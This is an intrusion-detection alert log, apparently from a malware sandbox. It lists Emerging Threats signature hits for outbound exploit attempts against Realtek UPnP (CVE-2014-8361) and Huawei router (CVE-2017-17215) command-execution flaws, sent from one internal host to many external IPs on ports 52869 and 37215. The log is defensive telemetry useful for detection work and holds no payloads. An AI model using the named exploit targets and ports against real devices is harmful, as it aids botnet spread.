                                                07/20/24-23:06:08.756759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696052869192.168.2.14150.183.16.234
                                                07/20/24-23:06:03.269499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4740852869192.168.2.1478.217.58.236
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578037215192.168.2.14157.234.60.234
                                                07/20/24-23:05:38.661785TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613609252869192.168.2.1445.131.99.6
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4890837215192.168.2.14133.238.127.11
                                                07/20/24-23:05:40.326086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23576252869192.168.2.1425.203.5.43
                                                07/20/24-23:06:19.575886TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614192052869192.168.2.1482.36.97.169
                                                07/20/24-23:05:52.544570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3728452869192.168.2.14203.182.119.62
                                                07/20/24-23:05:59.125247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4152052869192.168.2.14210.222.196.155
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044037215192.168.2.1463.243.11.1
                                                07/20/24-23:06:02.345691TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615046452869192.168.2.141.81.237.194
                                                07/20/24-23:05:36.329793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582837215192.168.2.14136.10.160.42
                                                07/20/24-23:06:05.144876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614388652869192.168.2.1471.168.119.24
                                                07/20/24-23:06:27.562825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5193452869192.168.2.1481.98.194.221
                                                07/20/24-23:05:40.377377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23581652869192.168.2.14139.117.217.229
                                                07/20/24-23:05:46.361141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613923252869192.168.2.14155.93.230.5
                                                07/20/24-23:05:57.153869TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23527652869192.168.2.14220.246.104.60
                                                07/20/24-23:05:57.478181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4644852869192.168.2.14194.186.6.67
                                                07/20/24-23:07:04.068388TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613733452869192.168.2.14114.85.98.80
                                                07/20/24-23:05:46.521911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614328252869192.168.2.14222.41.152.79
                                                07/20/24-23:06:00.265687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3340652869192.168.2.1453.149.94.192
                                                07/20/24-23:06:02.080862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5007452869192.168.2.14195.241.37.9
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223837215192.168.2.1441.115.205.202
                                                07/20/24-23:05:57.216313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614051852869192.168.2.14137.58.252.249
                                                07/20/24-23:05:59.382234TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614794852869192.168.2.1437.117.94.187
                                                07/20/24-23:06:58.705456TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25783052869192.168.2.1471.172.2.131
                                                07/20/24-23:06:17.564288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3397052869192.168.2.14105.103.200.101
                                                07/20/24-23:05:56.430020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.1441.227.39.152
                                                07/20/24-23:06:02.324702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4583652869192.168.2.14113.163.150.34
                                                07/20/24-23:05:59.091812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615684652869192.168.2.1479.208.10.184
                                                07/20/24-23:06:01.893152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613336852869192.168.2.14158.14.58.53
                                                07/20/24-23:05:37.449942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5930652869192.168.2.1449.40.97.50
                                                07/20/24-23:05:39.677505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3449837215192.168.2.1441.25.92.21
                                                07/20/24-23:05:57.550045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5128452869192.168.2.14130.56.1.95
                                                07/20/24-23:06:15.274610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5131852869192.168.2.14200.16.112.137
                                                07/20/24-23:05:40.475273TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25324452869192.168.2.14113.16.251.217
                                                07/20/24-23:06:02.125044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5452652869192.168.2.14142.64.187.253
                                                07/20/24-23:06:14.614915TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5731652869192.168.2.1419.50.129.57
                                                07/20/24-23:05:37.455022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25081452869192.168.2.14199.117.44.204
                                                07/20/24-23:06:13.525153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433052869192.168.2.1475.228.67.164
                                                07/20/24-23:06:24.373833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614918652869192.168.2.14115.179.211.118
                                                07/20/24-23:05:35.722490TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615367252869192.168.2.1417.184.234.0
                                                07/20/24-23:05:36.325898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053037215192.168.2.14204.51.37.135
                                                07/20/24-23:05:58.094268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614261052869192.168.2.1441.15.209.124
                                                07/20/24-23:05:37.542289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5826252869192.168.2.1478.129.211.10
                                                07/20/24-23:05:57.234632TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615310852869192.168.2.14132.216.98.22
                                                07/20/24-23:05:36.355198TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615935452869192.168.2.14207.229.195.229
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849837215192.168.2.1441.19.128.6
                                                07/20/24-23:05:52.542864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25207252869192.168.2.1465.189.243.195
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387837215192.168.2.14197.52.105.112
                                                07/20/24-23:05:36.317008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5370052869192.168.2.1480.164.32.127
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.1441.230.29.166
                                                07/20/24-23:06:02.872548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614112452869192.168.2.14143.185.187.241
                                                07/20/24-23:05:37.540434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23961452869192.168.2.1459.242.125.217
                                                07/20/24-23:05:37.472951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912452869192.168.2.14150.186.198.246
                                                07/20/24-23:05:38.808944TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3655852869192.168.2.14105.239.125.24
                                                07/20/24-23:05:40.462607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5786452869192.168.2.1468.68.58.116
                                                07/20/24-23:05:45.466981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539237215192.168.2.1472.34.5.77
                                                07/20/24-23:05:35.610945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4506852869192.168.2.14131.209.58.23
                                                07/20/24-23:07:23.916570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643852869192.168.2.14142.60.102.52
                                                07/20/24-23:05:38.089846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3615652869192.168.2.14161.126.18.243
                                                07/20/24-23:06:23.203920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25442452869192.168.2.14190.50.4.69
                                                07/20/24-23:05:45.424851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296237215192.168.2.14192.85.183.79
                                                07/20/24-23:05:57.651872TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25835852869192.168.2.14172.221.181.52
                                                07/20/24-23:05:35.991937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5695852869192.168.2.14102.124.228.209
                                                07/20/24-23:06:03.159645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25755852869192.168.2.14101.243.190.245
                                                07/20/24-23:05:33.827023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234037215192.168.2.14197.112.26.200
                                                07/20/24-23:05:52.502844TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25006052869192.168.2.1499.205.208.39
                                                07/20/24-23:05:57.913786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696652869192.168.2.14141.227.209.24
                                                07/20/24-23:05:52.589392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23883652869192.168.2.14207.223.84.204
                                                07/20/24-23:05:57.804757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565452869192.168.2.1480.193.144.183
                                                07/20/24-23:05:39.620310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711452869192.168.2.1469.91.98.213
                                                07/20/24-23:05:57.136226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287052869192.168.2.14105.54.61.6
                                                07/20/24-23:06:19.491493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5794452869192.168.2.1470.60.168.25
                                                07/20/24-23:05:59.227912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3857252869192.168.2.1412.176.0.4
                                                07/20/24-23:05:37.459218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24780052869192.168.2.1434.247.156.202
                                                07/20/24-23:06:14.544693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614077852869192.168.2.1417.155.126.73
                                                07/20/24-23:05:34.622534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794237215192.168.2.14157.100.189.26
                                                07/20/24-23:05:37.517011TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23765452869192.168.2.1443.124.228.32
                                                07/20/24-23:05:57.523834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24832252869192.168.2.1497.49.247.112
                                                07/20/24-23:05:36.021915TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615467852869192.168.2.1457.144.122.58
                                                07/20/24-23:05:46.333210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3964452869192.168.2.14196.229.8.153
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940437215192.168.2.14157.150.107.102
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285837215192.168.2.1441.24.36.133
                                                07/20/24-23:05:57.971515TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3505452869192.168.2.1487.182.203.169
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025637215192.168.2.14157.255.56.151
                                                07/20/24-23:05:56.430184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656637215192.168.2.14197.24.105.40
                                                07/20/24-23:06:08.628127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3861052869192.168.2.14184.148.131.220
                                                07/20/24-23:05:37.442841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5782452869192.168.2.144.162.121.105
                                                07/20/24-23:05:45.405121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14206.6.215.158
                                                07/20/24-23:05:42.245589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4404437215192.168.2.14157.5.87.86
                                                07/20/24-23:05:42.271822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329037215192.168.2.14157.239.54.103
                                                07/20/24-23:06:02.378063TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25274452869192.168.2.141.81.237.194
                                                07/20/24-23:05:45.468009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943237215192.168.2.1441.24.123.170
                                                07/20/24-23:06:13.620376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4727452869192.168.2.1497.106.240.203
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591437215192.168.2.1441.173.67.64
                                                07/20/24-23:05:46.119639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914837215192.168.2.14197.163.192.3
                                                07/20/24-23:05:50.522256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.14197.34.189.184
                                                07/20/24-23:05:56.036527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340837215192.168.2.1441.95.249.108
                                                07/20/24-23:05:57.159681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3472052869192.168.2.14209.194.5.31
                                                07/20/24-23:06:03.136885TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23801252869192.168.2.14195.159.191.213
                                                07/20/24-23:06:18.158860TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4895452869192.168.2.1438.39.9.123
                                                07/20/24-23:05:37.487250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24735452869192.168.2.14131.178.64.107
                                                07/20/24-23:05:40.462908TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24621652869192.168.2.1427.37.230.189
                                                07/20/24-23:05:48.748553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840637215192.168.2.14157.112.39.212
                                                07/20/24-23:05:37.440173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3291652869192.168.2.14145.229.168.132
                                                07/20/24-23:06:02.893558TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23292452869192.168.2.14168.67.89.55
                                                07/20/24-23:05:59.119988TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23331252869192.168.2.14204.159.132.238
                                                07/20/24-23:05:38.170018TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615575252869192.168.2.14100.187.132.120
                                                07/20/24-23:05:58.592016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4227652869192.168.2.1467.24.164.252
                                                07/20/24-23:08:18.360344TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615280052869192.168.2.14124.220.109.211
                                                07/20/24-23:06:22.140723TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614076852869192.168.2.14219.131.134.237
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704437215192.168.2.1441.179.93.180
                                                07/20/24-23:05:59.457721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312852869192.168.2.14107.221.240.37
                                                07/20/24-23:06:09.741345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287452869192.168.2.1485.18.47.80
                                                07/20/24-23:06:05.124335TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615839452869192.168.2.14145.108.231.36
                                                07/20/24-23:06:04.058070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386037215192.168.2.14157.134.20.79
                                                07/20/24-23:05:39.035942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907437215192.168.2.14149.34.24.190
                                                07/20/24-23:06:09.106479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25563252869192.168.2.14197.171.226.89
                                                07/20/24-23:05:40.426800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23415252869192.168.2.14176.44.128.80
                                                07/20/24-23:05:52.544972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24926852869192.168.2.14183.7.180.129
                                                07/20/24-23:05:59.290948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5340852869192.168.2.14145.209.73.208
                                                07/20/24-23:05:35.256504TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613619452869192.168.2.14148.30.198.131
                                                07/20/24-23:07:03.257276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613566852869192.168.2.1434.212.103.117
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4154837215192.168.2.14200.186.111.219
                                                07/20/24-23:05:45.101716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4615052869192.168.2.14126.160.124.198
                                                07/20/24-23:05:36.055523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3864452869192.168.2.1420.40.190.208
                                                07/20/24-23:05:45.414465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839437215192.168.2.14197.15.176.228
                                                07/20/24-23:05:37.612114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23377852869192.168.2.14118.75.62.14
                                                07/20/24-23:05:57.143736TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4631852869192.168.2.14132.82.133.46
                                                07/20/24-23:05:35.364015TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613615252869192.168.2.14203.171.109.95
                                                07/20/24-23:06:23.120505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614132852869192.168.2.14162.18.159.65
                                                07/20/24-23:05:37.497165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25771652869192.168.2.14218.175.31.238
                                                07/20/24-23:05:58.361554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4161252869192.168.2.1460.229.99.124
                                                07/20/24-23:05:40.330643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25896052869192.168.2.14163.148.202.115
                                                07/20/24-23:05:35.782996TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4216852869192.168.2.141.23.28.195
                                                07/20/24-23:05:52.589589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391252869192.168.2.1449.158.117.14
                                                07/20/24-23:05:34.654274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102237215192.168.2.1491.134.129.146
                                                07/20/24-23:06:35.309569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304652869192.168.2.14170.60.139.10
                                                07/20/24-23:05:36.343631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5527837215192.168.2.1441.16.187.35
                                                07/20/24-23:05:40.355766TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23993652869192.168.2.14119.64.194.144
                                                07/20/24-23:06:05.685688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23387452869192.168.2.1478.124.39.8
                                                07/20/24-23:06:15.110617TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615139852869192.168.2.14100.227.82.127
                                                07/20/24-23:05:58.087911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3736252869192.168.2.14122.131.100.31
                                                07/20/24-23:06:01.982337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874052869192.168.2.14126.18.149.137
                                                07/20/24-23:06:00.469923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25350252869192.168.2.1442.150.243.146
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14197.112.97.107
                                                07/20/24-23:05:52.531304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24031652869192.168.2.14189.133.191.207
                                                07/20/24-23:05:57.525433TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613658652869192.168.2.141.173.175.109
                                                07/20/24-23:06:22.925505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6080852869192.168.2.14200.157.116.174
                                                07/20/24-23:07:06.283235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4958252869192.168.2.14126.27.65.104
                                                07/20/24-23:06:00.947824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5756852869192.168.2.14104.64.121.105
                                                07/20/24-23:06:00.190685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3340452869192.168.2.14208.186.76.120
                                                07/20/24-23:06:20.736535TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613560452869192.168.2.14154.27.63.24
                                                07/20/24-23:06:01.934329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591852869192.168.2.14186.11.211.163
                                                07/20/24-23:07:25.723282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997252869192.168.2.14137.240.101.183
                                                07/20/24-23:07:04.345966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616069652869192.168.2.14167.123.39.124
                                                07/20/24-23:06:12.609835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23478252869192.168.2.14128.104.3.159
                                                07/20/24-23:05:58.383835TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25559052869192.168.2.14203.38.123.229
                                                07/20/24-23:06:15.480465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5122452869192.168.2.1412.242.114.145
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260837215192.168.2.14197.244.97.144
                                                07/20/24-23:06:02.071790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616062252869192.168.2.1427.46.145.139
                                                07/20/24-23:05:59.972369TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614343852869192.168.2.1419.25.67.71
                                                07/20/24-23:06:26.800191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5725052869192.168.2.14191.42.118.223
                                                07/20/24-23:05:36.332387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510637215192.168.2.1441.97.238.239
                                                07/20/24-23:05:37.447263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25547052869192.168.2.14183.59.191.208
                                                07/20/24-23:06:01.888773TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615865652869192.168.2.14126.18.149.137
                                                07/20/24-23:05:37.468386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24838052869192.168.2.14216.17.47.144
                                                07/20/24-23:05:39.566903TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5173452869192.168.2.1471.187.255.160
                                                07/20/24-23:05:44.273031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4269252869192.168.2.1499.215.247.10
                                                07/20/24-23:05:45.782282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4467452869192.168.2.1442.117.19.18
                                                07/20/24-23:06:11.296189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3977652869192.168.2.14126.128.13.90
                                                07/20/24-23:05:45.345649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639237215192.168.2.1441.101.142.243
                                                07/20/24-23:06:01.224583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4193052869192.168.2.1437.219.135.4
                                                07/20/24-23:05:58.172058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5759252869192.168.2.14172.221.181.52
                                                07/20/24-23:05:37.560327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4834652869192.168.2.14114.248.35.135
                                                07/20/24-23:05:45.988990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416637215192.168.2.1441.118.129.227
